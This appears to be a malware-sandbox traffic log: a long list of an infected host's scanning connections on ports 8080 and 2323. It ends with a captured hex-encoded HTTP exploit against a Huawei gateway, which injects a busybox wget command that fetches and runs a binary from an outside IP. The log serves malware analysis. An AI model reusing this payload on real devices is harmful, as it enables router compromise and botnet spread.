    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.248.214.80:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.157.131.241:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.248.4.84:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.246.194.205:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.62.159.147:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.120.151.71:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.62.45.167:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.30.161.24:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.196.224.66:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.9.113.243:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.24.230.154:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.158.14.174:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.126.166.163:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.64.135.229:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.199.172.240:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.233.159.17:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.89.106.56:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.242.40.209:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.224.76.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.150.97.31:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.63.232.140:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.205.250.161:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.32.246.236:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.140.92.55:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.123.9.224:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.24.144.138:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.129.162.213:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.131.14.20:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.132.235.150:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.142.129.193:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.252.161.153:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.97.145.19:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.191.166.149:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.167.150.233:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.22.76.40:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.215.160.125:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.169.13.112:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.74.236.122:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.202.30.27:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.148.94.197:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.73.95.177:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.52.9.102:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.44.94.243:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.158.61.124:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.173.91.153:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.209.130.186:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.101.62.224:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.98.168.0:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.32.4.243:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.139.200.1:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.145.112.166:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.31.103.44:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.24.135.73:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.146.10.175:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.208.70.69:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.192.247.189:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.138.141.210:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.39.202.85:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.70.241.51:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.190.252.35:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.20.205.178:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.238.168.222:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.8.41.48:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.153.247.208:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.19.97.110:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.136.7.105:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.38.180.9:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.129.49.195:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.222.240.162:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.141.227.72:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.152.118.24:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.177.1.45:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.137.8.159:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.255.23.70:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.234.7.12:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.59.173.41:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.36.140.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.100.11.208:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.200.110.232:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.59.188.82:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.232.109.85:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.99.152.41:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.19.249.223:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.48.183.133:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.241.179.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.236.74.173:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.140.180.77:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.104.208.226:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.228.188.128:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.104.50.133:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.185.124.91:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.48.170.75:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.91.254.207:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.154.31.86:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.116.113.179:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.15.31.58:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.239.40.22:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.92.113.251:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.244.233.30:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.239.176.62:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.228.245.120:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.237.185.192:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.222.60.253:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.175.57.32:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.87.186.52:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.62.224.52:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.168.170.184:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.205.36.225:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.50.231.42:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.120.185.47:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.41.75.27:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.82.208.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.87.247.27:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.59.111.240:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.3.71.171:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.182.20.192:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.64.46.195:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.128.127.64:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.51.32.41:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.168.93.90:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.34.98.38:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.101.91.207:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.39.204.76:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.245.51.151:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.69.237.73:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.141.201.75:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.105.213.106:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.157.48.167:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.3.134.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.14.142.19:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.2.95.33:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.29.24.249:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.59.233.198:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.200.65.187:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.60.154.213:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.27.176.200:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.139.166.47:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.44.40.109:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.29.82.164:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.233.153.124:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.91.153.27:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.230.48.195:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.62.97.56:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.255.174.121:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.25.2.0:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.59.68.159:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.58.24.191:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.246.21.107:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.199.254.168:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.173.250.188:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.202.51.117:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.84.221.136:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.142.226.7:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.101.66.41:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.27.53.199:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.85.168.210:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.46.117.158:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.104.141.91:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.3.13.7:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.213.119.27:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.155.179.106:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.20.29.9:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.214.174.123:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.148.223.244:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.112.99.35:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.79.186.150:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.31.135.142:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.233.213.251:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.34.86.79:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.83.57.75:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.168.167.215:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.169.47.71:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.153.229.176:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.10.190.191:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.65.92.202:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.56.70.203:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.253.69.190:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.211.255.217:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.127.151.250:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.142.68.78:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.118.167.14:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.53.61.9:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.112.225.129:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.147.167.150:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.139.106.73:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.150.107.61:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.114.212.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.11.77.228:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.87.91.192:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.113.137.70:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.202.118.160:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.28.116.75:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.84.35.113:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.146.167.221:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.62.135.110:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.143.153.105:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.126.38.44:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.214.227.90:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.90.118.236:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.194.21.222:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.166.155.199:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.52.178.35:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.22.130.116:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.62.27.210:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.27.48.110:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.130.6.220:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.171.28.106:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.133.124.81:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.217.210.246:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.160.190.122:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.203.33.184:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.144.133.58:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.32.234.140:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.120.79.144:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.89.179.142:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.135.100.57:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.228.101.38:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.188.90.116:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.27.231.7:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.139.245.66:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.97.161.121:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.189.21.17:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.18.114.252:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.111.66.252:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.236.240.70:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.117.46.234:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.121.235.199:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.217.170.242:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.104.212.179:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.173.13.4:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.88.143.167:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.32.161.240:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.83.6.219:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.220.23.73:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.24.95.49:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.148.117.98:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.154.209.78:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.49.158.34:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.42.148.20:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.244.172.179:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.200.19.215:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.203.10.162:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.117.200.119:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.180.217.91:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.177.84.221:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.26.56.24:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.97.251.52:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.189.5.116:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.45.2.55:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.142.5.249:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.85.237.118:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.184.38.96:8080
    Source: global trafficTCP traffic: 192.168.2.14:40478 -> 141.98.10.72:1024
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.224.84.17:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.24.137.70:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.165.183.93:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.171.235.114:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.39.197.124:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.192.44.254:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.112.77.249:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.145.70.225:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.108.80.121:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.213.79.194:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.234.58.67:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.59.205.57:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.21.109.164:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.162.56.129:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.218.172.12:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.187.112.47:8080
    Source: global trafficTCP traffic: 192.168.2.14:33323 -> 59.83.163.249:2323
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.221.119.163:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.188.217.119:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.164.51.133:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.177.197.181:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.176.219.80:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.141.104.129:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.220.103.90:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.158.65.210:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.13.71.126:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.161.200.111:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.191.209.55:8080
    Source: global trafficTCP traffic: 192.168.2.14:33323 -> 203.64.132.147:2323
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.172.66.26:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.166.2.113:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.53.184.102:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.162.143.240:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.87.31.27:8080
    Source: global trafficTCP traffic: 192.168.2.14:33323 -> 94.255.170.153:2323
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.1.104.62:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.127.108.250:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.105.211.131:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.228.109.176:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.172.163.59:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.127.235.153:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.218.183.3:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.92.242.207:8080
    Source: global trafficTCP traffic: 192.168.2.14:33323 -> 175.66.90.39:2323
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.146.194.54:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.158.55.222:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.66.53.111:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.44.51.205:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.188.43.85:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.15.32.181:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.229.84.163:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.239.57.107:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.221.73.17:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.106.107.79:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.32.255.97:8080
    Source: global trafficTCP traffic: 192.168.2.14:33323 -> 170.153.223.161:2323
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.253.8.170:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.240.94.82:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.163.96.221:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.186.109.189:8080
    Source: global trafficTCP traffic: 192.168.2.14:33323 -> 31.120.8.252:2323
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.19.197.144:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.193.64.89:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.131.215.255:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.183.86.44:8080
    Source: global trafficTCP traffic: 192.168.2.14:33323 -> 80.166.160.18:2323
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.191.211.193:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.235.0.214:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.236.248.229:8080
    Source: global trafficTCP traffic: 192.168.2.14:33323 -> 96.5.255.166:2323
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.226.70.88:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.151.215.15:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.252.48.32:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.75.65.12:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.5.229.23:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.86.171.78:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.252.47.199:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 85.36.43.237:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.187.69.75:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.253.174.154:8080
    Source: global trafficTCP traffic: 192.168.2.14:33323 -> 171.231.5.27:2323
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data 